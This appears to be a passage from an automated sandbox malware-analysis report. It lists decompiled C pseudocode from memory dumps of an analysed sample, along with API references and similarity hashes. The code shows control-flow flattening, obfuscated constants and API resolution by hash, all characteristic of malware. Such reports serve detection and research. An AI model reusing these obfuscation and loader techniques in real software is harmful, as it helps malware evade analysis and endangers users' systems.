                                            • API ID: State$DesktopFocusMessageSendWindow
                                            • String ID:
                                            • API String ID: 2814764316-0
                                            • Opcode ID: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
                                            • Instruction ID: b57d560b4246ca497f525dd7341a5897b5c585060d52b80c51f82830bbc2b57b
                                            • Opcode Fuzzy Hash: c3de53c5a3b934d276908d7c7df658ce1646e09da35e5cf36f041f9f8bba838b
                                            • Instruction Fuzzy Hash: 4C012032B003257FEB102B94ED45FA97798EB147A4F904437FE42D7191EAF8AC4396A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 60%
                                            			E02237740() {
                                            				void* __ebx;
                                            				void* __ebp;
                                            				intOrPtr* _t84;
                                            				signed int _t85;
                                            				signed int _t89;
                                            				intOrPtr* _t91;
                                            				intOrPtr* _t93;
                                            				intOrPtr* _t95;
                                            				intOrPtr* _t97;
                                            				void* _t101;
                                            				signed int _t106;
                                            				void* _t117;
                                            				intOrPtr* _t147;
                                            				intOrPtr _t149;
                                            				intOrPtr* _t152;
                                            				intOrPtr _t158;
                                            				short* _t160;
                                            				void* _t164;
                                            				void* _t166;
                                            				void* _t172;
                                            				void* _t177;
                                            				void* _t179;
                                            
                                            				 *(_t177 + 0x14) = 0xad9f;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x55c37b00;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0xd5c3ff9e;
                                            				 *(_t177 + 0x10) = 0x20cd;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x00419a00;
                                            				 *(_t177 + 4) = 0x7d7a;
                                            				_push(_t117);
                                            				 *(_t177 + 0x14) =  *(_t177 + 4) * 0x25;
                                            				_t172 = 0;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) >> 0xa;
                                            				_t164 = 0x37433c74;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) | 0x2c89345e;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) << 7;
                                            				 *(_t177 + 0x14) =  *(_t177 + 0x14) ^ 0x4d378000;
                                            				 *(_t177 + 0x18) = 0xca95;
                                            				 *(_t177 + 0x18) =  *(_t177 + 0x18) + 0xcbf5;
                                            				 *(_t177 + 0x18) =  *(_t177 + 0x18) | 0x7c83d5b7;
                                            				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x6758ba30;
                                            				 *(_t177 + 0x18) =  *(_t177 + 0x18) ^ 0x1bdb6d8d;
                                            				 *(_t177 + 0x10) = 0xd33c;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 9;
                                            				_t158 =  *((intOrPtr*)(_t177 + 0x2c));
                                            				 *(_t177 + 0x10) = 0x38e38e39 *  *(_t177 + 0x10) >> 0x20 >> 1;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0xe07bc090;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) * 0x69;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 1;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) << 0xb;
                                            				 *(_t177 + 0x10) =  *(_t177 + 0x10) ^ 0x0df2b000;
                                            				 *(_t177 + 0x1c) = 0xac79;
                                            				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) << 1;
                                            				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) + 0x2d22;
                                            				 *(_t177 + 0x1c) =  *(_t177 + 0x1c) ^ 0x00018615;
                                            				goto L1;
                                            				do {
                                            					while(1) {
                                            						L1:
                                            						_t179 = _t164 - 0x2d3069ff;
                                            						if(_t179 <= 0) {
                                            							break;
                                            						}
                                            						if(_t164 == 0x342fd613) {
                                            							_t160 =  *0x223e2ec + 0x278;
                                            							while( *_t160 != 0x5c) {
                                            								_t160 = _t160 + 2;
                                            							}
                                            							_t158 = _t160 + 2;
                                            							_t164 = 0x2685696e;
                                            							continue;
                                            						} else {
                                            							if(_t164 != 0x37433c74) {
                                            								goto L9;
                                            							} else {
                                            								_t164 = 0x194519ad;
                                            								continue;
                                            							}
                                            						}
                                            						L32:
                                            					}
                                            					if(_t179 == 0) {
                                            						_t84 =  *0x223e024;
                                            						if(_t84 == 0) {
                                            							_t84 = E02233E80(_t117, E02233F20(0xbb398380), 0x5262aefc, _t172);
                                            							 *0x223e024 = _t84;
                                            						}
                                            						_t85 =  *_t84(_t177 + 0x30);
                                            						_t147 =  *0x223e194;
                                            						 *((intOrPtr*)(_t177 + 0x2c)) = 2 + _t85 * 2;
                                            						if(_t147 == 0) {
                                            							_t147 = E02233E80(_t117, E02233F20(0x667fdee), 0x1595373a, _t172);
                                            							 *0x223e194 = _t147;
                                            						}
                                            						_t89 =  *_t147( *((intOrPtr*)(_t177 + 0x3c)), _t158,  *(_t177 + 0x18),  *((intOrPtr*)(_t177 + 0x20)), _t177 + 0x30,  *((intOrPtr*)(_t177 + 0x2c)));
                                            						_t164 = 0x1ff1a285;
                                            						asm("sbb ebp, ebp");
                                            						_t172 =  ~_t89 + 1;
                                            						goto L1;
                                            					} else {
                                            						if(_t164 == 0x194519ad) {
                                            							_t166 = E022334C0(0x223d8f0);
                                            							_t91 =  *0x223dc60;
                                            							if(_t91 == 0) {
                                            								_t91 = E02233E80(_t117, E02233F20(0xe66945e6), 0xcca28b0d, _t172);
                                            								 *0x223dc60 = _t91;
                                            							}
                                            							_t149 =  *0x223e2ec;
                                            							 *_t91(_t177 + 0x3c, 0x104, _t166, _t149 + 0x5c, _t149 + 0x278);
                                            							_t93 =  *0x223dea8;
                                            							_t177 = _t177 + 0x14;
                                            							if(_t93 == 0) {
                                            								_t93 = E02233E80(_t117, E02233F20(0xbb398380), 0x97f883e, _t172);
                                            								 *0x223dea8 = _t93;
                                            							}
                                            							_t117 =  *_t93();
                                            							_t95 =  *0x223e1a0;
                                            							if(_t95 == 0) {
                                            								_t95 = E02233E80(_t117, E02233F20(0xbb398380), 0x26c3f343, _t172);
                                            								 *0x223e1a0 = _t95;
                                            							}
                                            							 *_t95(_t117, 0, _t166);
                                            							_t164 = 0x342fd613;
                                            							goto L1;
                                            						} else {
                                            							if(_t164 == 0x1ff1a285) {
                                            								_t97 =  *0x223dfc4; // 0x0
                                            								if(_t97 == 0) {
                                            									_t97 = E02233E80(_t117, E02233F20(0x667fdee), 0x217c84a0, _t172);
                                            									 *0x223dfc4 = _t97;
                                            								}
                                            								 *_t97( *((intOrPtr*)(_t177 + 0x28)));
                                            								return _t172;
                                            							} else {
                                            								if(_t164 == 0x2685696e) {
                                            									_t101 = E022334C0(0x223d960);
                                            									_t152 =  *0x223dbec; // 0x0
                                            									_t117 = _t101;
                                            									if(_t152 == 0) {
                                            										_t152 = E02233E80(_t117, E02233F20(0x667fdee), 0x7aac94ee, _t172);
                                            										 *0x223dbec = _t152;
                                            									}
                                            									_t106 =  *_t152( *((intOrPtr*)(_t177 + 0x40)), _t117,  *((intOrPtr*)(_t177 + 0x34)), 0,  *(_t177 + 0x1c),  *(_t177 + 0x18), 0, _t177 + 0x28, 0);
                                            									asm("sbb esi, esi");
                                            									_t164 = ( ~_t106 & 0x09cffb0d) + 0x2d3069ff;
                                            									E02233460(_t117);
                                            								}
                                            								goto L9;
                                            							}
                                            						}
                                            					}
                                            					goto L32;
                                            					L9:
                                            				} while (_t164 != 0x3700650c);
                                            				return _t172;
                                            				goto L32;
                                            			}


























                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true
                                            • Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp
                                            • Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: "-$t<C7$t<C7$z}$Ei
                                            • API String ID: 0-1832362217
                                            • Opcode ID: e4adcce6c35a1f889401b5948a6bf664202137480bc17e0be31b9365fbb61e49
                                            • Instruction ID: ffdbdb14ab31fa6b2e8b7a2e8d621c55d7d2d710b0a3df79f717aa686a4ac370
                                            • Opcode Fuzzy Hash: e4adcce6c35a1f889401b5948a6bf664202137480bc17e0be31b9365fbb61e49
                                            • Instruction Fuzzy Hash: D581E0B1A143029FC715EFA4E848A2BB7E6ABC4704F40491CF496C7258EB74DE08CBD2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041580E(void* __ecx) {
                                            				void* _t11;
                                            				void* _t12;
                                            				void* _t16;
                                            
                                            				_t12 = __ecx;
                                            				if((E00416528(__ecx) & 0x40000000) != 0) {
                                            					L6:
                                            					return E004136A7(_t12);
                                            				}
                                            				_t16 = E00404DAE();
                                            				if(_t16 == 0 || GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
                                            					goto L6;
                                            				} else {
                                            					SendMessageA( *(_t16 + 0x1c), 0x111, 0xe146, 0);
                                            					_t11 = 1;
                                            					return _t11;
                                            				}
                                            			}







                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • GetKeyState.USER32(00000010), ref: 00415832
                                            • GetKeyState.USER32(00000011), ref: 0041583B
                                            • GetKeyState.USER32(00000012), ref: 00415844
                                            • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0041585A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd
                                            Similarity
                                            • API ID: State$LongMessageSendWindow
                                            • String ID:
                                            • API String ID: 1063413437-0
                                            • Opcode ID: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
                                            • Instruction ID: 667728aae4084d5946ddf495d1d29dbc27f199ee829e175ed2889692379dfdac
                                            • Opcode Fuzzy Hash: 12084169472d455916fea6db0bf09667f92a5ea2c7c3b09716cbb5453971e85a
                                            • Instruction Fuzzy Hash: 47F0E232740746E5E63036931C42FD913144FC0BD4F45083AB701AE1D18A9988E30278
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 80%
                                            			E02236530(void* __edx) {
                                            				intOrPtr _v8;
                                            				char _v16;
                                            				char _v24;
                                            				signed int _v28;
                                            				intOrPtr _v32;
                                            				intOrPtr _v36;
                                            				intOrPtr _v40;
                                            				char _v48;
                                            				char _v76;
                                            				signed int _v80;
                                            				char _v88;
                                            				char _v96;
                                            				char _v100;
                                            				char _v104;
                                            				char _v112;
                                            				signed int _v120;
                                            				signed int _v124;
                                            				signed int _v128;
                                            				void* __ebx;
                                            				void* __ebp;
                                            				void* _t198;
                                            				void* _t200;
                                            				signed int _t207;
                                            				signed int _t209;
                                            				signed int _t214;
                                            				signed int _t220;
                                            				void* _t222;
                                            				void* _t223;
                                            				void* _t224;
                                            				signed int _t225;
                                            				intOrPtr* _t227;
                                            				signed int _t228;
                                            				void* _t229;
                                            				void* _t230;
                                            				signed int _t234;
                                            				signed int _t236;
                                            				void* _t237;
                                            				signed int _t240;
                                            				intOrPtr* _t241;
                                            				signed int _t242;
                                            				void* _t243;
                                            				void* _t244;
                                            				signed int _t249;
                                            				void* _t254;
                                            				signed int _t255;
                                            				intOrPtr* _t256;
                                            				void* _t257;
                                            				intOrPtr* _t258;
                                            				signed int _t259;
                                            				void* _t260;
                                            				signed int _t272;
                                            				signed int _t274;
                                            				void* _t276;
                                            				signed int _t280;
                                            				signed int _t285;
                                            				intOrPtr* _t287;
                                            				signed int _t293;
                                            				signed int _t300;
                                            				signed int _t304;
                                            				intOrPtr _t308;
                                            				signed int _t318;
                                            				signed int _t347;
                                            				signed int _t348;
                                            				signed int _t369;
                                            				signed int _t371;
                                            				void* _t375;
                                            				signed int _t385;
                                            				signed int _t391;
                                            				signed int _t396;
                                            				void* _t398;
                                            				void* _t400;
                                            				void* _t401;
                                            				void* _t402;
                                            				void* _t403;
                                            
                                            				_t398 = (_t396 & 0xfffffff8) - 0x80;
                                            				_t300 = _v120;
                                            				_t191 = 0x12823d32;
                                            				_t391 = _v124;
                                            				while(1) {
                                            					L1:
                                            					_t375 = 0x2564be4f;
                                            					do {
                                            						while(1) {
                                            							L2:
                                            							_t400 = _t191 - 0x1ff46034;
                                            							if(_t400 > 0) {
                                            								goto L60;
                                            							}
                                            							L3:
                                            							if(_t400 == 0) {
                                            								return E0223B160();
                                            							} else {
                                            								_t401 = _t191 - 0xfd5a1ac;
                                            								if(_t401 > 0) {
                                            									__eflags = _t191 - 0x16bf64f2;
                                            									if(__eflags > 0) {
                                            										__eflags = _t191 - 0x1ea773fc;
                                            										if(__eflags > 0) {
                                            											__eflags = _t191 - 0x1fdef138;
                                            											if(_t191 != 0x1fdef138) {
                                            												break;
                                            											} else {
                                            												_v8 =  *((intOrPtr*)( *0x223e2ec + 0x48));
                                            												_t191 = 0x1ea773fc;
                                            												continue;
                                            											}
                                            										} else {
                                            											if(__eflags == 0) {
                                            												_v40 = E02235360(_t300, _t391);
                                            												_t191 = 0x216a974b;
                                            												continue;
                                            											} else {
                                            												__eflags = _t191 - 0x1c32e2d2;
                                            												if(_t191 == 0x1c32e2d2) {
                                            													E02234250(_t300, _v112);
                                            													_t191 = 0x39deb3f9;
                                            													continue;
                                            												} else {
                                            													__eflags = _t191 - 0x1c5e7f9f;
                                            													if(_t191 != 0x1c5e7f9f) {
                                            														break;
                                            													} else {
                                            														_t191 = 0x30d1bd42;
                                            														continue;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									} else {
                                            										if(__eflags == 0) {
                                            											_t272 = E02235F60( &_v76, _t347, _t391);
                                            											__eflags = _t272;
                                            											if(_t272 == 0) {
                                            												L77:
                                            												_t191 = 0x1ff46034;
                                            											} else {
                                            												_v48 =  &_v76;
                                            												_t274 =  *0x223e144;
                                            												__eflags = _t274;
                                            												if(_t274 == 0) {
                                            													_t276 = E02233F20(0xbb398380);
                                            													_t347 = 0x5262aeca;
                                            													_t274 = E02233E80(_t300, _t276, 0x5262aeca, _t391);
                                            													 *0x223e144 = _t274;
                                            												}
                                            												_t327 =  &_v76;
                                            												_v48 =  *_t274( &_v76);
                                            												_t191 = 0x1fdef138;
                                            											}
                                            											continue;
                                            										} else {
                                            											__eflags = _t191 - 0x14860a92;
                                            											if(__eflags > 0) {
                                            												__eflags = _t191 - 0x166b1152;
                                            												if(_t191 != 0x166b1152) {
                                            													break;
                                            												} else {
                                            													E02238EA0();
                                            													_t191 = 0x1381dc55;
                                            													continue;
                                            												}
                                            											} else {
                                            												if(__eflags == 0) {
                                            													E02238550(_t300);
                                            													_t191 = 0x2aa5d516;
                                            													continue;
                                            												} else {
                                            													__eflags = _t191 - 0x12823d32;
                                            													if(_t191 == 0x12823d32) {
                                            														_t191 = 0x27047861;
                                            														continue;
                                            													} else {
                                            														__eflags = _t191 - 0x1381dc55;
                                            														if(_t191 != 0x1381dc55) {
                                            															break;
                                            														} else {
                                            															E02239470(_t391);
                                            															_t191 = 0x315a7589;
                                            															continue;
                                            														}
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								} else {
                                            									if(_t401 == 0) {
                                            										_t280 = E022390C0();
                                            										asm("sbb eax, eax");
                                            										_t191 = ( ~_t280 & 0x0810ea45) + 0xb70f210;
                                            										continue;
                                            									} else {
                                            										_t402 = _t191 - 0xd28318f;
                                            										if(_t402 > 0) {
                                            											__eflags = _t191 - 0xe9d6a0f;
                                            											if(__eflags > 0) {
                                            												__eflags = _t191 - 0xf0c159c;
                                            												if(_t191 != 0xf0c159c) {
                                            													break;
                                            												} else {
                                            													_t209 = E022396B0();
                                            													__eflags = _t209;
                                            													if(_t209 == 0) {
                                            														L142:
                                            														return _t209;
                                            													} else {
                                            														_t191 = 0xfd5a1ac;
                                            														continue;
                                            													}
                                            												}
                                            											} else {
                                            												if(__eflags == 0) {
                                            													E02237EC0();
                                            													__eflags =  *( *0x223e2ec + 0x268);
                                            													_t191 =  !=  ? 0x21c0adc4 : 0x14860a92;
                                            													continue;
                                            												} else {
                                            													__eflags = _t191 - 0xddcb99d;
                                            													if(_t191 == 0xddcb99d) {
                                            														_t285 = E0223B2B0( &_v88, _t391);
                                            														__eflags = _t285;
                                            														if(_t285 != 0) {
                                            															asm("xorps xmm0, xmm0");
                                            															_t391 = 0x8e1a01c;
                                            															asm("movlpd [esp+0x18], xmm0");
                                            															_t300 = _v120;
                                            														}
                                            														L30:
                                            														_t191 = 0xa28b6e5;
                                            														continue;
                                            													} else {
                                            														__eflags = _t191 - 0xe0d6cd8;
                                            														if(_t191 != 0xe0d6cd8) {
                                            															break;
                                            														} else {
                                            															E02239D70(_t300);
                                            															_t347 = 0xcfd93ac1;
                                            															_t391 = 0x1c5e7f9f;
                                            															_t287 = E02234190(_t300, 0xbb398380, 0xcfd93ac1, 0x1c5e7f9f, 0xcf);
                                            															_t398 = _t398 + 4;
                                            															 *_t287();
                                            															_t300 = 0xcfd93ac1;
                                            															L27:
                                            															_t191 = 0x2537e9de;
                                            															continue;
                                            														}
                                            													}
                                            												}
                                            											}
                                            										} else {
                                            											if(_t402 == 0) {
                                            												_v124 = 0x669c;
                                            												_t347 = 0xcccccccd * _v124 >> 0x20 >> 5;
                                            												_v124 = _t347;
                                            												_v124 = _v124 ^ 0x00000178;
                                            												_v28 = _v124;
                                            												_t191 = 0x8e1a01c;
                                            												continue;
                                            											} else {
                                            												_t403 = _t191 - 0x8e1a01c;
                                            												if(_t403 > 0) {
                                            													__eflags = _t191 - 0xa28b6e5;
                                            													if(_t191 == 0xa28b6e5) {
                                            														E02234250(_t300, _v96);
                                            														_t191 = 0x1c32e2d2;
                                            														continue;
                                            													} else {
                                            														__eflags = _t191 - 0xb70f210;
                                            														if(_t191 != 0xb70f210) {
                                            															break;
                                            														} else {
                                            															_t293 = E02238240(_t300, _t391);
                                            															_t308 =  *0x223e2ec;
                                            															__eflags = _t293;
                                            															if(_t293 == 0) {
                                            																__eflags =  *(_t308 + 0x268);
                                            																_t191 =  !=  ? 0x3278b521 : 0x166b1152;
                                            															} else {
                                            																__eflags =  *(_t308 + 0x268);
                                            																_t191 =  !=  ? _t375 : 0xe0d6cd8;
                                            															}
                                            															continue;
                                            														}
                                            													}
                                            												} else {
                                            													if(_t403 == 0) {
                                            														E022360E0( &_v24);
                                            														_t191 = 0x4326e25;
                                            														while(1) {
                                            															L2:
                                            															_t400 = _t191 - 0x1ff46034;
                                            															if(_t400 > 0) {
                                            																goto L60;
                                            															}
                                            															goto L3;
                                            														}
                                            														goto L60;
                                            													} else {
                                            														if(_t191 == 0x2c8787f) {
                                            															E02238530();
                                            															_t191 = 0xddcb99d;
                                            															while(1) {
                                            																L2:
                                            																_t400 = _t191 - 0x1ff46034;
                                            																if(_t400 > 0) {
                                            																	goto L60;
                                            																}
                                            																goto L3;
                                            															}
                                            														} else {
                                            															if(_t191 != 0x4326e25) {
                                            																break;
                                            															} else {
                                            																E0223B050( &_v16);
                                            																_t191 = 0x2b42ebb2;
                                            																while(1) {
                                            																	L2:
                                            																	_t400 = _t191 - 0x1ff46034;
                                            																	if(_t400 > 0) {
                                            																		goto L60;
                                            																	}
                                            																	goto L3;
                                            																}
                                            															}
                                            														}
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            							}
                                            							L143:
                                            							L60:
                                            							__eflags = _t191 - 0x2b42ebb2;
                                            							if(__eflags > 0) {
                                            								__eflags = _t191 - 0x3299e430;
                                            								if(__eflags > 0) {
                                            									__eflags = _t191 - 0x39deb3f9;
                                            									if(__eflags > 0) {
                                            										__eflags = _t191 - 0x39f8f5db;
                                            										if(_t191 != 0x39f8f5db) {
                                            											break;
                                            										} else {
                                            											_v124 = 0xaaf5;
                                            											_t391 = 0x16bf64f2;
                                            											_v124 = _v124 >> 3;
                                            											_v124 = _v124 + 0xffff9253;
                                            											_v124 = _v124 ^ 0xffff9931;
                                            											_v128 = 0xf5b3;
                                            											_v128 = _v128 + 0xb403;
                                            											_v128 = _v128 + 0xffff5bc8;
                                            											_v128 = _v128 + 0x6fbb;
                                            											_v128 = _v128 + 0xe315;
                                            											_v128 = _v128 | 0x5d55179d;
                                            											_v128 = _v128 + 0xafac;
                                            											_v128 = _v128 << 2;
                                            											_v128 = _v128 ^ 0x7560216c;
                                            											_t157 =  &_v128; // 0x7560216c
                                            											__eflags = _v124 -  *_t157;
                                            											if(_v124 <=  *_t157) {
                                            												__eflags = 0;
                                            											} else {
                                            												_t348 =  *0x223dd4c;
                                            												__eflags = _t348;
                                            												if(_t348 == 0) {
                                            													_t348 = E02233E80(_t300, E02233F20(0xbb398380), 0xae3c1a47, 0x16bf64f2);
                                            													 *0x223dd4c = _t348;
                                            												}
                                            												_v124 = 0xaaf5;
                                            												_v124 = _v124 >> 3;
                                            												_v124 = _v124 + 0xffff9253;
                                            												_v124 = _v124 ^ 0xffff9931;
                                            												_t200 = E02235E10();
                                            												_t347 =  *_t348() % (_v124 - _t200);
                                            											}
                                            											_t318 =  *0x223ddbc; // 0x0
                                            											__eflags = _t318;
                                            											if(_t318 == 0) {
                                            												_t198 = E02233F20(0xbb398380);
                                            												_t347 = 0xcfd93ac1;
                                            												_t318 = E02233E80(_t300, _t198, 0xcfd93ac1, _t391);
                                            												 *0x223ddbc = _t318;
                                            											}
                                            											_v128 = 0xf5b3;
                                            											_v128 = _v128 + 0xb403;
                                            											_v128 = _v128 + 0xffff5bc8;
                                            											_v128 = _v128 + 0x6fbb;
                                            											_v128 = _v128 + 0xe315;
                                            											_v128 = _v128 | 0x5d55179d;
                                            											_v128 = _v128 + 0xafac;
                                            											_v128 = _v128 << 2;
                                            											_v128 = _v128 ^ 0x7560216c;
                                            											 *_t318();
                                            											_t300 = _t347;
                                            											_t191 = 0x2537e9de;
                                            											asm("adc ebx, 0x0");
                                            											goto L1;
                                            										}
                                            									} else {
                                            										if(__eflags == 0) {
                                            											E02234250(_t300, _v16);
                                            											_t191 = 0x3540656b;
                                            											continue;
                                            										} else {
                                            											__eflags = _t191 - 0x3540656b;
                                            											if(_t191 == 0x3540656b) {
                                            												E02234250(_t300, _v24);
                                            												_t191 = 0x2537e9de;
                                            												continue;
                                            											} else {
                                            												__eflags = _t191 - 0x380a1784;
                                            												if(_t191 != 0x380a1784) {
                                            													break;
                                            												} else {
                                            													_t347 =  &_v88;
                                            													_t207 = E022374E0( &_v96, _t347);
                                            													__eflags = _t207;
                                            													if(_t207 == 0) {
                                            														goto L30;
                                            													} else {
                                            														E0223AE60(0);
                                            														_t327 = _v80;
                                            														_t191 = 0x2c8787f;
                                            														__eflags = _t327;
                                            														if(_t327 != 0) {
                                            															__eflags = _t327 - 7;
                                            															_t327 = 0x3299e430;
                                            															_t191 =  ==  ? 0x3299e430 : 0x2c8787f;
                                            														}
                                            													}
                                            													continue;
                                            												}
                                            											}
                                            										}
                                            									}
                                            								} else {
                                            									if(__eflags == 0) {
                                            										_t209 = E02238590(_t391);
                                            										goto L142;
                                            									} else {
                                            										__eflags = _t191 - 0x315a7589;
                                            										if(__eflags > 0) {
                                            											__eflags = _t191 - 0x3278b521;
                                            											if(_t191 != 0x3278b521) {
                                            												break;
                                            											} else {
                                            												E02238CD0();
                                            												_t191 = 0x166b1152;
                                            												continue;
                                            											}
                                            										} else {
                                            											if(__eflags == 0) {
                                            												_t209 = E02238A10();
                                            												__eflags = _t209;
                                            												if(_t209 == 0) {
                                            													goto L142;
                                            												} else {
                                            													_t191 = 0xe9d6a0f;
                                            													continue;
                                            												}
                                            											} else {
                                            												__eflags = _t191 - 0x30d1bd42;
                                            												if(_t191 == 0x30d1bd42) {
                                            													_t347 =  &_v100;
                                            													_v104 = E02233310(0x223d2e0, _t347);
                                            													E02231890( &_v104);
                                            													E02233460(_t211);
                                            													_t191 = 0x314203dc;
                                            													while(1) {
                                            														L1:
                                            														_t375 = 0x2564be4f;
                                            														goto L2;
                                            													}
                                            												} else {
                                            													__eflags = _t191 - 0x314203dc;
                                            													if(_t191 != 0x314203dc) {
                                            														break;
                                            													} else {
                                            														_t191 = 0x39f8f5db;
                                            														continue;
                                            													}
                                            												}
                                            											}
                                            										}
                                            									}
                                            								}
                                            							} else {
                                            								if(__eflags == 0) {
                                            									_t347 =  &_v112;
                                            									_t327 =  &_v48;
                                            									_t214 = E022372A0( &_v48, _t347);
                                            									asm("sbb eax, eax");
                                            									_t191 = ( ~_t214 & 0xf0f0f5bd) + 0x39deb3f9;
                                            									continue;
                                            								} else {
                                            									__eflags = _t191 - 0x2564be4f;
                                            									if(__eflags > 0) {
                                            										__eflags = _t191 - 0x2aa5d516;
                                            										if(__eflags > 0) {
                                            											__eflags = _t191 - 0x2acfa9b6;
                                            											if(_t191 != 0x2acfa9b6) {
                                            												break;
                                            											} else {
                                            												_v128 = 0xe36c;
                                            												_t347 =  &_v112;
                                            												_v128 = _v128 * 0x71;
                                            												_v128 = _v128 + 0xffff86a2;
                                            												_v128 = _v128 * 0x7b;
                                            												_v128 = _v128 >> 6;
                                            												_v128 = _v128 | 0x57610b65;
                                            												_v128 = _v128 ^ 0x57e10f64;
                                            												_t220 = E022312B0(_v128, _t347,  &_v96);
                                            												_t398 = _t398 + 4;
                                            												__eflags = _t220;
                                            												if(_t220 == 0) {
                                            													_t327 =  *0x223e2e0;
                                            													 *(_t327 + 0xc) =  &(( *(_t327 + 0xc))[2]);
                                            													__eflags =  *( *(_t327 + 0xc));
                                            													if( *( *(_t327 + 0xc)) == 0) {
                                            														 *(_t327 + 0xc) =  *(_t327 + 8);
                                            													}
                                            													_v128 = 0xc5a1;
                                            													_t391 = 0x8e1a01c;
                                            													_v128 = _v128 ^ 0xe0738efa;
                                            													_v128 = _v128 >> 6;
                                            													_v128 = _v128 + 0xffffe737;
                                            													_v128 = _v128 ^ 0x0381bbc4;
                                            													_t222 = E02235D50();
                                            													__eflags = _v128 - _t222;
                                            													if(_v128 <= _t222) {
                                            														_t304 = 0;
                                            														__eflags = 0;
                                            													} else {
                                            														_t227 = E02234190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
                                            														_t398 = _t398 + 4;
                                            														_t228 =  *_t227();
                                            														_t229 = E02235D50();
                                            														_t230 = E02235D20();
                                            														_t327 = _t230 - _t229;
                                            														_t347 = _t228 % (_t230 - _t229);
                                            														_t304 = _t347;
                                            													}
                                            													_t369 =  *0x223ddbc; // 0x0
                                            													__eflags = _t369;
                                            													if(_t369 == 0) {
                                            														_t225 = E02233F20(0xbb398380);
                                            														_t347 = 0xcfd93ac1;
                                            														_t327 = _t225;
                                            														_t369 = E02233E80(_t304, _t225, 0xcfd93ac1, _t391);
                                            														 *0x223ddbc = _t369;
                                            													}
                                            													_t223 = E02235D50();
                                            													_t224 =  *_t369();
                                            													_t300 = _t347;
                                            													_t371 = _t224 + _t304 + _t223;
                                            													_t191 = 0x1c32e2d2;
                                            													asm("adc ebx, 0x0");
                                            												} else {
                                            													_v124 = 0xb2e0;
                                            													_t391 = 0x8e1a01c;
                                            													_t234 = _v124;
                                            													_t327 = (_t234 << 4) - _t234 << 2;
                                            													_v124 = (_t234 << 4) - _t234 << 2;
                                            													_v124 = _v124 ^ 0x00245720;
                                            													_v128 = 0x89fa;
                                            													_v128 = _v128 + 0xffffb442;
                                            													_v128 = _v128 + 0xffffdaaf;
                                            													_v128 = _v128 >> 0xb;
                                            													_v128 = _v128 ^ 0x000c3503;
                                            													__eflags = _v124 - _v128;
                                            													if(_v124 <= _v128) {
                                            														_t385 = 0;
                                            														__eflags = 0;
                                            													} else {
                                            														_t241 = E02234190(_t300, 0xbb398380, 0xae3c1a47, 0x8e1a01c, 0xb3);
                                            														_t398 = _t398 + 4;
                                            														_t242 =  *_t241();
                                            														_t243 = E02235DC0();
                                            														_t244 = E02235D90();
                                            														_t327 = _t244 - _t243;
                                            														_t347 = _t242 % (_t244 - _t243);
                                            														_t385 = _t347;
                                            													}
                                            													_t236 =  *0x223ddbc; // 0x0
                                            													__eflags = _t236;
                                            													if(_t236 == 0) {
                                            														_t240 = E02233F20(0xbb398380);
                                            														_t347 = 0xcfd93ac1;
                                            														_t327 = _t240;
                                            														_t236 = E02233E80(_t300, _t240, 0xcfd93ac1, _t391);
                                            														 *0x223ddbc = _t236;
                                            													}
                                            													_v128 = 0x89fa;
                                            													_v128 = _v128 + 0xffffb442;
                                            													_v128 = _v128 + 0xffffdaaf;
                                            													_v128 = _v128 >> 0xb;
                                            													_v128 = _v128 ^ 0x000c3503;
                                            													_t237 =  *_t236();
                                            													_t300 = _t347;
                                            													_t371 = _t237 + _v128 + _t385;
                                            													_t191 = 0x380a1784;
                                            													asm("adc ebx, 0x0");
                                            												}
                                            												while(1) {
                                            													L1:
                                            													_t375 = 0x2564be4f;
                                            													goto L2;
                                            												}
                                            											}
                                            										} else {
                                            											if(__eflags == 0) {
